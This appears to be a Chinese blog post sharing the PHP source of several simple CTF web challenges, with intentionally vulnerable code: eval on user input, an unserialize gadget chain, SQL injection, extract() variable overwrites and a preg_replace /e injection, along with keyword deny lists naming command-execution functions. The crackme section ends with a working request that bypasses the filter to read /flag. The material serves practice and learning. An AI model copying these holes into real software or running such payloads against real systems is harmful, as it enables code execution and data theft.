Sorry, your browser cannot access this site
This page requires browser support (enable) JavaScript
Learn more >

数条简易的CTF题目

发布于:2025年7月15日

次浏览

截取自某CTF比赛…肯定放水了
本来想写Writeup,想了想还是懒了

evilecho

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

echo "<h2>Tips: eval & echo = ?</h2>";

$hostHeader = $_SERVER['HTTP_HOST'];
list($hostname, $port) = explode(':', $hostHeader);

$image = isset($_GET["file"]) ? "./images/" . $_GET["file"] : "";

if ($image == "") {
    header("Location: " . "http://$hostname:$port" . "/index.php?file=eason.jpg");
}

$file = "echo '<img src=\"" . $image . "\" width=200px height=auto>';";

if (in_array(strtolower($image), array("cat", " ", "flag", "docker", "shell_exec", "exec", "popen"))) {
    exit("Hacker!!!!");
}
eval ($file);

?>

happy

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
 <?php
highlight_file(__FILE__);
error_reporting(0);

class hahaha
{
    public $cmd;
    public $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

}

class Nevv
{
    public $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }

}

class Rabbit
{
    public $aspiration;
    public function __set($name, $val)
    {
        return $this->aspiration->family;
    }
}

class Year
{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "come on") {
            $this->firecrackers();
        } else {
            print ("Welcome 2025!!!!!");
        }
    }
}

if (isset($_GET['poc'])) {
    $a = unserialize($_GET['poc']);
} else {
    echo "come on";
}


?>

issql

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<html xmlns="http://www.w3.org/1999/xhtml">
<!--This set of source code is made by MS. -->
<!--Date 2018.12.13-->
	<head>
		<meta http-equiv=Content-Type content="text/html;charset=utf-8">
		<meta name="description" content="Test">
		<meta name="author" content="MRYE+">
		<title>电脑信息查询 - 网络安全工作室</title>
		<link rel="stylesheet" type="text/css" href="./css/ctf.css" />	
    </style>
</head>
<body>
<div class="container">
  <div id="search">
    <label for="search">输入以1、2、3显示电脑信息</label>
	<form id="myForm" action="" method="post">
    <input type="text" id="ms" name="ms"maxlength="1">
    <input class="button" type="submit" value="Search">
	</form>
<?php
//禁用错误报告
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
require_once './suxinctf.php';

if(isset($_POST["ms"]))
{
	$ID = $_POST["ms"];
	#echo $ID;
	$query = "select * from goods where id='{$ID}'";//构建查询语句
	$result = mysql_query($query);//执行查询
	if (!$result) {
		die("could not to the database\n" . mysql_error());
	}
	if (mysql_numrows($result)<=0) {
		echo "<script 	type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>";
	}else{
	while($result_row=mysql_fetch_row(($result)))//取出结果并显示
	{
		$ms=$result_row[0];
		$gname=$result_row[1];
		$gprice=$result_row[2];
		$gnum=$result_row[3];
		echo "<font color='red'>电脑编号为:".$ms."  </font> ";;
		echo "<font color='red'>电脑系统为:".$gname."  </font>";
		echo "<font color='red'>电脑价格为:".$gprice."  </font>";
		echo "<font color='red'>电脑数量为:".$gnum."  </font>";
}
}
}
	$query = "select * from goods ";//构建查询语句
	$result = mysql_query($query);//执行查询
	if (!$result) {
		die("could not to the database\n" . mysql_error());
	}
	if (mysql_numrows($result)<=0) {
		echo "<script 	type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>";
	}else{
	while($result_row=mysql_fetch_row(($result)))//取出结果并显示
	{
		$ms=$result_row[0];
		$gname=$result_row[1];
	}

mysql_close($connection);//关闭连接
}
?>
  </div>
</div>
</body>
</html>

suxinctf.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$host = 'localhost';
$database = 'ctf';
$username = 'root';
$password = '';
$connection = mysql_connect($host, $username, $password);//连接到数据库
mysql_query("set names 'utf8'");//编码转化
if (!$connection) {
    die("could not connect to the database.\n" . mysql_error());//诊断连接错误
}
$selectedDb = mysql_select_db($database);//选择数据库
if (!$selectedDb) {
    die("could not to the database\n" . mysql_error());
}
?>

ezphp

register.php 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
    include "utils/function.php";
    $config = include "utils/config.php";
    $user_xml_format = "<?xml version='1.0'?>
                        <userinfo>
                            <user>
                                <username>%s</username>
                                <password>%s</password>
                            </user>
                        </userinfo>";
    extract($_REQUEST);
    if(empty($username)||empty($password)) die("Username or password cannot be empty XD");

    if(!preg_match('/^[a-zA-Z0-9_]+$/', $username)) die("Invalid username. :(");

    if(is_user_exists($username, $config["user_info_dir"])) die("User already exists XD");
    $user_xml = sprintf($user_xml_format, $username, $password);

    register_user($username, $config['user_info_dir'], $user_xml);

login.php

1
2
3
4
5
6
7
8
9
10
<?php
    include "utils/function.php";
    $config = include  "utils/config.php";
    $username = $_REQUEST['username'];
    $password = $_REQUEST['password'];
    if(empty($username)||empty($password)) die("Username or password cannot be empty XD");
    if(!is_user_exists($username, $config["user_info_dir"])) die("Username error");
    $user_record = get_user_record($username, $config['user_info_dir']);
    if($user_record->user->password != $password) die("Password error for User:".$user_record->user->username);
    header("Location:main.html");

crackme

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if ($_GET['crack'] === 'flag') {
    highlight_file(__FILE__);
    if (isset($_POST['hk']) && isset($_POST['flag'])) {
        $str1 = $_POST['hk'];
        $str2 = $_POST['flag'];
        if (preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i', $str1) || strlen($str2) != 19 || preg_match('/give_me_flag/', $str2)) {
            die('hacker!');
        } else {
            preg_replace("/give_me_flag/ei", $_POST['hk'], $_POST['flag']);
        }
    }
} else {
    echo "moran want a flag.</br>(?crack=flag)";
}
1
2
3
POST ?crack=flag&a=readfile&b=/flag HTTP/1.1

hk=$_GET[a]($_GET[b])&flag=give_me_Flag/ei1111

这题试了好久…就是没想到用GET的方式传递

博客内容遵循 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议

本文永久链接是:https://wuminboke.site/2025/07/15/some-random-ctf-challenge/

更新于:2025年7月15日

评论



Uses Volantis as theme. You can find source in https://github.com/volantis-x/volantis-docs.

(CC BY-NC-SA 4.0)

萌ICP备20235354号

Feed(Atom)